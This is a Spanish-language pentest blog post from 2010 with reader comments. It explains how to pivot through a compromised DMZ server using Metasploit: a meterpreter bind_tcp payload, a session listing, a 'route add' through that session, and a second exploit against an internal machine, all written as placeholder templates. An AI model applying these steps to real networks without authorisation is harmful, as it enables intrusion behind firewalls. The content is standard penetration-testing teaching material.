Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida Publicada por Epsilon en Herramientas Seguridad, Pentest .
Algunas veces, al realizar un ataque es necesario vulnerar varias maquinas hasta llegar a nuestro objetivo final, uno de los interrogantes mas comunes en estas situaciones es ¿Como puedo atacar una maquina desde otra la cual ya tenga acceso?
Veamos un ejemplo:
Como podemos ver en la imagen anterior, un atacante puede ganar el acceso en algún servidor que se encuentre en la DMZ (zona desmiritalizada) y desde allí atacar otras maquinas que se encuentren detrás del cortafuegos. Para hacer esto posible el amado y conocido Metasploit nos puede ser muy útil.
El primer paso obviamente es encontrar una vulnerabilidad en el servidor que se encuentra en la DMZ, explotarla usando como payload meterpreter. En la consola del metasploit digitamos:
use [exploit que ataca la vulnerabilidad encontrada]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [ip_host_dmz]
exploit-que-ataca-la-vulnerabilidad-encontrada
Ahora necesitamos saber el ID de la sesión, para esto digitamos lo siguiente en la consola de meterpreter:
sessions -l
El siguiente paso es crear una ruta hacia la maquina objetivo, indicando su ip, la mascara y el ID session que obtuvimos en el paso anterior:
msf> route add [ip_maquina_objetivo] [Mascara de red] [ID-Session]
Por ultimo, lanzamos el ataque a la maquina objetivo, de forma normal como se haría en cualquier caso, es decir buscando la vulnerabilidad y aplicando el exploit respectivo, lo diferente es que debemos decirle al metasploit que debe pasar por el pc que ya se tiene acceso:
msf> use [exploit_necesario]
msf> set PAYLOAD windows/meterpreter/bind_tcp
msf> set RHOST [maquina_objetivo]
msf> exploit
De esta forma podremos bypassear usando el metasploit, algo muy útil para todos los interesados en el área de la seguridad informática
c1b3rh4ck
kradjc (kR@d)
alex
d3m4s1@d0v1v0
4v4t4r (4v4t4r)
Alejandro Ramos
belial9826
diego
Dino
gnusumosa (Junior...
Enero 26th, 2010 at 6:30 PM
está muy bien, pero el final no queda nada claro.
Supongo que cuando dices que hay que indicarle al metasploit por que PC debe pasar, te refieres que eso se indica cuando agregamos la ruta no?
Un saludo!!!
Enero 26th, 2010 at 7:14 PM
Pues la verdad, esperaba algo mas de profundidad en el articulo!.
No creo que aporte algo diferente a lo que hemos visto ultimamente en los foros!.
Enero 26th, 2010 at 7:19 PM
Epsil0n, me gustaria que este articulo lo montaramos en un laboratorio de los que suelen hacer en Dragon! seria un poco mas claro y completo!
Ademas, seria bueno tambien de paso, mirar que registran un IDS cuando se lanza un ataque contra un servidor de una DMZ.
Eso nos podria ayudar a detectar estos tipos de ataque.
De paso se montaria algo muy interesante para la comunidad!
Vos que llevas mas rato en la comunidad, puedes decirme si esto ya se ha echo!, sino, contactemos a 4v4t4r y le proponemos el tema!
Si algo hablemso en IRC.
Enero 26th, 2010 at 10:12 PM
Hay que tener en cuenta que depende mucho de la configuración de defensa perimetral, es decir Vlans, políticas de aseguramiento y filtrado, portrigering,firewalls,etc.
Bytes
Dino
Enero 27th, 2010 at 4:33 AM
Si el Firewall está bien configurado, no te debe dejar pasar de DMZ -> LAN ….
Enero 27th, 2010 at 5:50 AM
[...] This post was mentioned on Twitter by DragoN, FrikiFeeds. FrikiFeeds said: Bypass con Metasploit … → http://bit.ly/aFH2BA [...]
Enero 27th, 2010 at 10:34 AM
SecurityTesting…me ganaste al publicar el comentario
…pero hay que tener en cuenta que muchos sistemas instalan Firewalls y ni siquiera los configuran bien..